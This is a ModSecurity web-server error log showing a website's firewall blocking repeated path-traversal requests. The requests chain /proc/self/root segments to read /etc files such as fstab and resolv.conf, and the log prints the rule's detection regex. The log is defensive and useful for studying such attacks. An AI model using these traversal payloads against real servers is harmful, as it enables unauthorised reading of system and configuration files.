referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:04.654530 2026] [:error] [pid 1731:tid 140411699963648] [client 74.7.243.203:44016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX1Ab2qCuy5irgBMjOiQAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:05.942893 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:44026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX1QeiSKl8TjouI-YHwQAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:08.290014 2026] [:error] [pid 18709:tid 140411658000128] [client 74.7.243.203:44030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX2DarLhPAjZGI1b2z9gAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:14.920806 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.243.203:44040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX3qt8Nd0UC_OcbVG1EAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:17.303025 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:54696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX4a4xEDsg_V3ESNY5YgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:18.566738 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:54712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX4qBJNF7axNlVR0UDIwAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:19.896070 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:54716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX45qmL8PQht4WJFlN5QAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:21.257653 2026] [:error] [pid 18604:tid 140411641214720] [client 74.7.243.203:40672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX5UBd0UqwxWindINt-QAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:26.714508 2026] [:error] [pid 18709:tid 140411649607424] [client 74.7.243.203:40678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX6jarLhPAjZGI1b20BAAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:28.034717 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.203:40688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX7K4xEDsg_V3ESNY5ZQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:29.350596 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:40690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX7a4xEDsg_V3ESNY5ZgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:32:44.251270 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.243.203:35794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablX_O82sZHvlq4xgHrJLwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:33:15.396497 2026] [:error] [pid 1731:tid 140411590858496] [client 74.7.243.203:34408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYGwb2qCuy5irgBMjOrgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:33:22.391530 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:56640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYIpqmL8PQht4WJFlOBQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:33:23.709071 2026] [:error] [pid 18604:tid 140411666392832] [client 74.7.243.203:35700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYI0Bd0UqwxWindINuBQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:33:25.015102 2026] [:error] [pid 1016:tid 140411565680384] [client 74.7.241.46:46244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYJZqmL8PQht4WJFlOCAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:33:36.017504 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.46:48232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYMKBJNF7axNlVR0UDPQAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:33:53.844678 2026] [:error] [pid 18604:tid 140411666392832] [client 74.7.241.46:56276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYQUBd0UqwxWindINuGQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:34:08.427019 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.203:35716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYUKt8Nd0UC_OcbVG1oQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:34:09.726840 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:33356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYUdCmCSWTlPouqorSOQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:34:17.063925 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.244.31:35690] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablYWdCmCSWTlPouqorSOgAAANE"]
[Tue Mar 17 10:34:22.515203 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.46:51646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablYXgeiSKl8TjouI-YH8gAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
